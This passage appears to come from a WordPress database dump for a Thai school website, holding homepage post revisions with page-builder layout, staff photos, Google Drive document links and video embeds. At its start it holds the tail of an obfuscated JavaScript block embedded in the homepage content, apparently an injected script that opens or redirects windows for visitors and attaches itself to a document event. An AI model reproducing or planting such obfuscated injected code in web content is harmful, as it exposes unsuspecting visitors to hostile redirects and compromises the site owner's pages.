_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-06-27 13:49:42','2025-06-27 06:49:42','',19,'http://watprato.ssk.in.th/?p=502',0,'revision','',0),
(503,1,'2025-06-27 13:50:46','2025-06-27 06:50:46','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtu.be/C9do6YkaRVU?si=6QeXpJR-PUh7xatA\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/LVfYUq7zwYQ?si=PRL0_feQTmuxz4ZK\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/LVfYUq7zwYQ?si=PRL0_feQTmuxz4ZK\n</div></figure>\n<!-- /wp:embed --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" 